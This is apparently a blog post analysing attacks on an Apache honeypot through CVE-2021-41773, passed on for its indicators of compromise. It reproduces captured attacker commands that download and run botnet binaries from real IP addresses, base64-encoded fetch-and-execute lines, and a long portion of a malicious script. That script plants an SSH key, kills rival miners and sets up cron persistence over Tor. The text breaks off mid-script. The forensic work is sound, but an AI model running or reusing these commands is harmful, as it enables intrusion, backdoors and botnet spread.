[Mon Nov 29 00:03:13.009116 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v perl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:33:58.483898 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ping 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:35:08.854471 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ping 2> /dev/null)" -a ! "$(command -v ssh 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:36:01.589083 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ping 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 14:27:06.966555 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v printf 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 23:57:31.374578 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;a='00000000';if [ "$(command -v curl 2> /dev/null)" ]; then echo 'curl';a=$(timeout 5 curl -s http://49.12.205.171/test.txt 2> /dev/null); else if [ "$(command -v wget 2> /dev/null)" ]; then echo 'wget';a=$(timeout 5 wget http://49.12.205.171/test.txt -qO- 2> /dev/null); else if [ "$(command -v perl 2> /dev/null)" ]; then echo 'perl';a=$(echo "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr=>'49.12.205.171',PeerPort =>'80',Proto => 'tcp');die \\"Could not create socket: \\$!\\\\n\\" unless \\$sock;print \\$sock \\"GET /test.txt HTTP/1.0\\\\r\\\\n\\\\r\\\\n\\";my \\$a=0;while( \\$line = <\\$sock>) { print \\$line if(\\$a > 0); \\$a = 1 if(\\$line eq \\"\\\\r\\\\n\\");} close(\\$sock);" | timeout 5 perl); else echo 'No cmd'; fi; fi; fi; if [ ! "$a" -eq "11223344" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 12:59:49.905673 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:00:39.022332 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ps 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:02:54.018345 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:03:57.133784 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:04:28.236658 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v perl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:05:51.286147 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:32:15.602743 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; uname -m;echo vulnable
[Tue Nov 30 14:35:40.549398 2021]  A=|echo;echo vulnable
[Tue Nov 30 14:56:27.461472 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; uname -m;echo vulnable
[Tue Nov 30 15:54:28.092976 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;  psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  };  netfunc() { cmd=""; ret=1;  if [ "$(command -v timeout 2> /dev/null)" ]; then cmd="timeout $3";  fi;  if [ "$(command -v curl 2> /dev/null)" ]; then cmd="$cmd curl --connect-timeout $3 -s $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --interface $4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v wget 2> /dev/null)" ]; then cmd="$cmd wget --connect-timeout=$3 -qO- $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --bind-address=$4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v perl 2> /dev/null)" ]; then bind=""; cmd="$cmd perl";  if [ ! -z $4 ]; then bind=", LocalAddr=> '$4'";  fi;  ret=$(printf %s "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr => '$1', PeerPort => '$2', Proto => 'tcp' $bind);die \\"Err\\\\n\\" unless \\$sock;close(\\$sock);" | $cmd > /dev/null 2>&1; echo $?); fi;  fi;  fi;  if [ "$ret" -eq "0" 2> /dev/null ]; then printf %b "$cmd\\n";  fi;  };  if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 'Ready';  else echo 'Already install Running';  fi; echo vulnable
[Tue Nov 30 15:54:56.728753 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;  psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  };  netfunc() { cmd=""; ret=1;  if [ "$(command -v timeout 2> /dev/null)" ]; then cmd="timeout $3";  fi;  if [ "$(command -v curl 2> /dev/null)" ]; then cmd="$cmd curl --connect-timeout $3 -s $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --interface $4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v wget 2> /dev/null)" ]; then cmd="$cmd wget --connect-timeout=$3 -qO- $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --bind-address=$4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v perl 2> /dev/null)" ]; then bind=""; cmd="$cmd perl";  if [ ! -z $4 ]; then bind=", LocalAddr=> '$4'";  fi;  ret=$(printf %s "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr => '$1', PeerPort => '$2', Proto => 'tcp' $bind);die \\"Err\\\\n\\" unless \\$sock;close(\\$sock);" | $cmd > /dev/null 2>&1; echo $?); fi;  fi;  fi;  if [ "$ret" -eq "0" 2> /dev/null ]; then printf %b "$cmd\\n";  fi;  };  if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 'Ready';  else echo 'Already install Running';  fi; uname -m;echo vulnable
[Wed Dec 01 13:43:26.701088 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;  psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  };  netfunc() { cmd=""; ret=1;  if [ "$(command -v timeout 2> /dev/null)" ]; then cmd="timeout $3";  fi;  if [ "$(command -v curl 2> /dev/null)" ]; then cmd="$cmd curl --connect-timeout $3 -s $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --interface $4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v wget 2> /dev/null)" ]; then cmd="$cmd wget --connect-timeout=$3 -qO- $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --bind-address=$4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v perl 2> /dev/null)" ]; then bind=""; cmd="$cmd perl";  if [ ! -z $4 ]; then bind=", LocalAddr=> '$4'";  fi;  ret=$(printf %s "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr => '$1', PeerPort => '$2', Proto => 'tcp' $bind);die \\"Err\\\\n\\" unless \\$sock;close(\\$sock);" | $cmd > /dev/null 2>&1; echo $?); fi;  fi;  fi;  if [ "$ret" -eq "0" 2> /dev/null ]; then printf %b "$cmd\\n";  fi;  };  if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 'Ready';  else echo 'Already install Running';  fi; uname -m;echo vulnable

Some of this code is recognizably repurposed from the encoded scripts from Nov 14. There are references to hxxp://94.130.181.216/test.txt and hxxp://49.12.205.171/test.txt, both of which currently return “11223344”. Both of these IPs are also owned by Hetzner, where all of the rest of the URLs we’ve seen have been hosted.

Wrapping Up

That was quite the twisty maze of shell code, but at the end of the analysis we have a good idea of how the suspicious processes were launched and the contents of “.src.sh”. And we have multiple still active URL paths worth monitoring for, including hxxp://rr.blueheaven.live/1010/ and hxxp://116.203.212.184/1010/. Also keep an eye out for the “.log/1010*/.spoollog” path showing up in temp directories and as the process CWD for new processes on your systems.

Hudak’s Honeypot (Part 2)

This is Part 2 in a series. Part 1 is here.

During my triage I noticed a suspicious file /var/tmp/dk86. It’s a 64-bit Linux ELF executable, owned by user “daemon”, created 2021-11-11 19:09:51 UTC. MD5 checksum is d9f82dbf8733f15f97fb352467c9ab21, and searching that on VirusTotal indicates that this is a Tsunami botnet agent. Strings in the binary include the Japanese phrase “nandemo shiranai wa yo, shitteru koto dake” (“I don’t know anything, only what you know”).

Since the file is owned by the same “daemon” user the system’s web server is running as, it’s reasonable to assume this file was created via the CVE-2021-41773 vulnerability the honeypot was created to study. So I went to the web logs under /var/log/apache2 to try and find a web request that matches the timestamp on the file. There’s an exact timestamp match on an entry from IP address 141.135.85.36.

141.135.85.36 - - [11/Nov/2021:19:09:51 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 - "-" "-"

There are a total of 132 logged requests from this IP on November 11 and 12. While most requests have a null user agent, there are two that are tagged as coming from “zgrab/0.x” (part of the ZMapProject).

141.135.85.36 - - [11/Nov/2021:19:21:30 +0000] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 zgrab/0.x"
141.135.85.36 - - [11/Nov/2021:19:32:04 +0000] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 zgrab/0.x"

WHOIS search on the IP address comes back to a residential IP block owned by Telenet in Belgium.

All of the requests are POST requests. In a normal investigation, that would be the end of the story because POST request data is normally not logged. Happily, Tyler enabled mod_dumpio in the web server, which captures all the data between browser and server in the Apache error_log. There’s a lot of noise, but I’m going to use a little command-line kung fu to reduce the amount of data and am showing you some of the more interesting excerpts below.

# grep 141.135.85.36 error_log | egrep -v '[0-9]* (read)?bytes' | fgrep -v '\r\n' | sed 's/\[dumpio.*data-HEAP)://; s/\[pid .* AH[0-9]*://'
[... snip ...]
[Thu Nov 11 19:09:14.268592 2021]  echo; ls /tmp;
[Thu Nov 11 19:09:14.478663 2021]  echo; pwd
[Thu Nov 11 19:09:14.696024 2021]  echo; whoami
[Thu Nov 11 19:09:14.910345 2021]  echo; hostname
[Thu Nov 11 19:09:29.415116 2021]  echo; wget -O /tmp/dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86;
[... snip ...]
[Thu Nov 11 19:09:29.700476 2021] [cgi:error]  2021-11-11 19:09:29 (346 KB/s) - '/tmp/dk86' saved [48748/48748]: /bin/bash
[... snip ...]
[Thu Nov 11 19:09:29.910929 2021]  echo; pwd
[Thu Nov 11 19:09:30.128200 2021]  echo; whoami
[Thu Nov 11 19:09:30.348177 2021]  echo; hostname
[Thu Nov 11 19:09:32.047781 2021]  P
[Thu Nov 11 19:09:32.053130 2021]  echo; ls /tmp;
[Thu Nov 11 19:09:32.403631 2021]  echo; pwd
[Thu Nov 11 19:09:32.619051 2021]  echo; whoami
[Thu Nov 11 19:09:32.835332 2021]  echo; hostname
[Thu Nov 11 19:09:46.456875 2021]  echo; chmod +x /tmp/dk86;
[Thu Nov 11 19:09:46.680203 2021]  echo; pwd
[Thu Nov 11 19:09:46.895844 2021]  echo; whoami
[Thu Nov 11 19:09:47.117973 2021]  echo; hostname
[Thu Nov 11 19:09:51.416009 2021]  P
[Thu Nov 11 19:09:51.419657 2021]  echo; /tmp/dk86;
[Thu Nov 11 19:09:51.467033 2021] [cgi:error]  no crontab for daemon: /bin/bash
[Thu Nov 11 19:09:51.468329 2021] [cgi:error]  no crontab for daemon: /bin/bash
[Thu Nov 11 19:09:51.481268 2021] [cgi:error]  no crontab for daemon: /bin/bash
[Thu Nov 11 19:09:51.481589 2021] [cgi:error]  no crontab for daemon: /bin/bash
[... snip ...]
[Thu Nov 11 19:32:20.965680 2021]  echo; id
[Thu Nov 11 19:33:05.094087 2021]  echo; id
[Thu Nov 11 19:34:03.356167 2021]  echo; id
[Thu Nov 11 19:35:40.387396 2021]  echo; id
[Thu Nov 11 19:39:36.040592 2021]  echo; id
[Thu Nov 11 19:49:54.240192 2021]  echo; curl http://103.116.168.68/apache80

Unfortunately, at the time of this writing neither of the URLs shown above is responding. However if you do a Google search for the 138.197.206.223 URL, there is a great deal of intel about this site, including this link.

In any event, we can get a decent idea of the sequence of events by looking at the mod_dumpio output. At 19:09:29, /tmp/dk86 gets dropped. This program is executed at 19:09:51, so we assume that this is where /var/tmp/dk86 comes from. The error output also indicates that /tmp/dk86 is trying to interact with the crontab for user “daemon”. However, we find no cron entries for this user in the system image.

/tmp/dk86 has been removed. There’s been so much churn in /tmp that I doubt this file is recoverable. But I might go looking for it in the future. If I find anything, I’ll write that up in a separate blog post.

There’s another interesting set of commands in the mod_dumpio output from Nov 12:

[Fri Nov 12 09:10:08.135090 2021]  echo; id
[Fri Nov 12 09:13:37.621551 2021]  echo; id
[Fri Nov 12 09:13:39.252263 2021]  echo; curl http://172.93.50.138/d | sh
[... snip ...]
[Fri Nov 12 09:13:39.369510 2021] [cgi:error]  dk86: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.371785 2021] [cgi:error]  chmod: : /bin/bash
[Fri Nov 12 09:13:39.371845 2021] [cgi:error]  cannot access 'dk86': /bin/bash
[Fri Nov 12 09:13:39.371900 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:39.371918 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.377158 2021] [cgi:error]  dk32: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.379557 2021] [cgi:error]  sh: 1: : /bin/bash
[Fri Nov 12 09:13:39.379605 2021] [cgi:error]  ./dk86: not found: /bin/bash
[Fri Nov 12 09:13:39.379620 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.381071 2021] [cgi:error]  chmod: : /bin/bash
[Fri Nov 12 09:13:39.381121 2021] [cgi:error]  cannot access 'dk32': /bin/bash
[Fri Nov 12 09:13:39.381167 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:39.381182 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.383487 2021] [cgi:error]  sh: 2: : /bin/bash
[Fri Nov 12 09:13:39.383625 2021] [cgi:error]  ./dk32: not found: /bin/bash
[Fri Nov 12 09:13:39.383641 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.387727 2021] [cgi:error]  dk86: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.388725 2021] [cgi:error]  chmod: : /bin/bash
[Fri Nov 12 09:13:39.388765 2021] [cgi:error]  cannot access 'dk86': /bin/bash
[Fri Nov 12 09:13:39.388802 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:39.388814 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.389853 2021] [cgi:error]  sh: 1: : /bin/bash
[Fri Nov 12 09:13:39.389980 2021] [cgi:error]  ./dk86: not found: /bin/bash
[... snip ...]
[Fri Nov 12 09:13:39.482184 2021] [cgi:error]  bash: line 39: $(pwd)/.SgII: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.486157 2021] [cgi:error]  bash: line 41: /usr/local/bin/.SgII: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.487927 2021] [cgi:error]  bash: line 42: /.SgII: Permission denied: /bin/bash
[Fri Nov 12 09:13:40.674001 2021] [cgi:error]  grep: : /bin/bash
[Fri Nov 12 09:13:40.674091 2021] [cgi:error]  /.ssh/authorized_keys: /bin/bash
[Fri Nov 12 09:13:40.674141 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:40.674156 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:40.675165 2021] [cgi:error]  bash: line 252: /.ssh/authorized_keys: No such file or directory: /bin/bash
[Fri Nov 12 09:13:40.676620 2021] [cgi:error]  bash: line 252: [: -gt: unary operator expected: /bin/bash
[Fri Nov 12 09:13:40.679150 2021] [cgi:error]  grep: : /bin/bash
[Fri Nov 12 09:13:40.679194 2021] [cgi:error]  /.ssh/authorized_keys: /bin/bash
[Fri Nov 12 09:13:40.679232 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:40.679244 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:40.680151 2021] [cgi:error]  bash: line 254: /.ssh/authorized_keys: No such file or directory: /bin/bash
[Fri Nov 12 09:13:51.131698 2021]  echo; id
[Fri Nov 12 09:13:52.076968 2021]  echo; pwd
[Fri Nov 12 09:13:52.294907 2021]  echo; whoami
[Fri Nov 12 09:13:52.516101 2021]  echo; hostname
[Fri Nov 12 09:13:54.127156 2021]  P
[Fri Nov 12 09:13:54.132660 2021]  echo; crontab -l;
[Fri Nov 12 09:13:54.346927 2021]  echo; pwd
[Fri Nov 12 09:13:54.566587 2021]  echo; whoami
[Fri Nov 12 09:13:54.784133 2021]  echo; hostname

The 172.93.50.138 URL is responsive and returns the following:

wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &
wget -O dk32 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk32; chmod +x dk32; ./dk32 &

echo "d2dldCAtTyBkazg2IGh0dHA6Ly8xMzguMTk3LjIwNi4yMjM6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9kazg2OyBjaG1vZCAreCBkazg2OyAuL2RrODYgJg==" | base64 -d | sh
echo "Y3VybCBodHRwOi8vMTU5Ljg5LjE4Mi4xMTcvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2V2ZW50ZWVuL2xkbSB8IGJhc2g=" | base64 -d | sh

And here it is without the base64 encoding:

wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &
wget -O dk32 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk32; chmod +x dk32; ./dk32 &

echo 'wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &' | sh
echo 'curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm | bash' | sh

As I noted above, the 138.197.206.223 URL is non-responsive. But I got a very interesting script back from hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm which I’m reproducing at the end of this blog post. The script really needs root privileges to execute, which were never achieved during this compromise. However, you can read through the script and extract plenty of interesting items for your threat intel teams, including a .onion URL, plus an embedded SSH public key that the script tries to put into /root/.ssh/authorized_keys. There’s also some attempted manipulation of /etc/ld.so.preload, which is indicative of an LD_PRELOAD type rootkit like the ones Craig Rowland has been blogging about.

Ultimately our dk86 compromise never really got going due to lack of privileges. But that doesn’t mean we can’t extract a great deal of useful indicators for future compromise attempts. In upcoming blog posts I will be digging into other compromises on the honeypot that actually achieved their goals. Stay tuned!

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad"

TOR1=".tor2web.su/"
TOR2=".onion.ly/"
TOR3=".onion.ws/"
RPATH1='src/ldm'

TIMEOUT="75"
CTIMEOUT="22"
COPTS="-fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT}"
WOPTS="--quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT}"

C1=""
C2=""

sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout -k 5 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
fi

if [ $(rm --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then rm="rm"; elif [ $(rrn --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then rm="rrn"; else rm="echo"; for f in /bin/*; do strings $f 2>/dev/null|grep -qi " rm does not remove dir" && rm="$f" && ${sudo} mv -f $rm /bin/rrn && break; done; fi
if [ $(curl --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="curl"; elif [ $(lxc --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="lxc"; else curl="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi "Dump libcurl equivalent" && curl="$f" && ${sudo} mv -f $curl ${bpath}/lxc && break; done; fi
if [ $(wget --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="wget"; elif [ $(lxw --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="lxw"; else wget="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi ".wgetrc'-style command" && wget="$f" && ${sudo} mv -f $wget ${bpath}/lxw && break; done; fi

if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ] && [ -f "$0" ]; then
    ${sudo} chmod +x "$0"
    nohup ${sudo} "$0" -n >/dev/null 2>&1 &
    echo 'Sent!'
    exit $?
fi

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1

skey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf+9gNG5s2rdTMBkOp6P7mKIQ/OkbgiozmZ3syhELI4L0M1TmJiRbbrIta8662z4WAKhXpiU22llfwrkN0m8yKJApd8lDzvvdBw+ShzJr+WaEWX7uW3WCe5NCxGxc6AU7c2vmuLlO0B203pIGVIbV1xJmj6MXrdZpNy7QRo9zStWmgmVY4GR4v26R3XDOn1gshuQ6PgUqgewQ+AlslLVuekdH23sLQfejXyJShcoFI6BbH67YTcoh4G/TuQdGe8lIeAAmp7lzzHMyu+2iSNoFFCeF48JSA2YZvssFOsGuAtV/9uPNQoi9EyvgM2mGDgJJ"
if [ "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi

hload=$(ps aux|grep -v 'l0'|grep -v 'eth1'|grep -v 'lan0'|grep -v '^-'| grep -v 'eth0'|grep -v 'inet0'|grep -v 'lano'|grep -v grep|grep -v defunct|grep -v "knthread"|grep -vi 'aaaaaaaaaa'|grep -vi 'java '|grep -vi 'jenkins'|grep -vi 'exim'|awk '{if($3>=54.0) print $11}'|head -n 1)
[ "${hload}" != "" ] && { ps ax|grep -v grep|grep -v defunct|grep -v knthread|grep -F "${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then echo "killing: ${pid}"; kill -9 "${pid}" >/dev/null 2>&1; fi; done; }

hload2=$(ps aux|grep -v 'l0'|grep -v 'eth1'|grep -v 'lan0'| grep -v '^-' | grep -v 'eth0'|grep -v 'inet0'|grep -v 'lano'|grep -v grep|grep -v defunct|grep -v python|grep -v knthread|grep -vi 'aaaaaaaaaa'|grep -vi "bash"|grep -vi 'exim'|awk '{if($3>=0.0) print $2}'|uniq)
if [[ ! "${hload2}" == "" ]]; then
    for p in ${hload2}; do
        xm=''
        if [[ $p -gt 301 ]] && [[ ! "$pid" == "$$" ]] && [[ ! "$pid" == "$PPID" ]]; then
            if [ -f /proc/${p}/exe ]; then
                xmf="$(readlink /proc/${p}/exe 2>/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>&1)
            elif [ -f /proc/${p}/comm ]; then
                xmf="$(readlink /proc/${p}/cwd)/$(cat /proc/${p}/comm)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>&1)
            fi
            if [[ "${xm}" == *"matches"* ]]; then
                                echo "killing ${p} and removing: ${xmf}"
                                kill -9 ${p} >/dev/null 2>&1
                                ${rm} -rf ${xmf} >/dev/null 2>&1
                        fi
        fi
    done
fi

sockz() {
        n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
        p=$(echo "dns-query?name=relay.l33t-ppl.info")
        s=$(${curl} ${COPTS} https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)
}

cik() {
        CS="SHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=''\nHOME=/"
        CR=$(crontab -l 2>/dev/null | grep 'pty')

        if [ "$curl" != "echo" ]; then
                CRON11='n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM\\%13))]}/$p | grep -oE "\\b([0-9]{1,3}\.){3}[0-9]{1,3}\\b" |tr " " "\\\\n"|sort -uR|head -1);'
                CRON11="$CRON11""FETCH_OPTS=\"-fsSLk --connect-timeout 26 --max-time 75\";""(curl -x socks5h://\$s:9050 $RHOST.onion/src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR1}src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR2}src/ldm || curl \${FETCH_OPTS} https://${RHOST}${TOR3}src/ldm)|bash"
        else
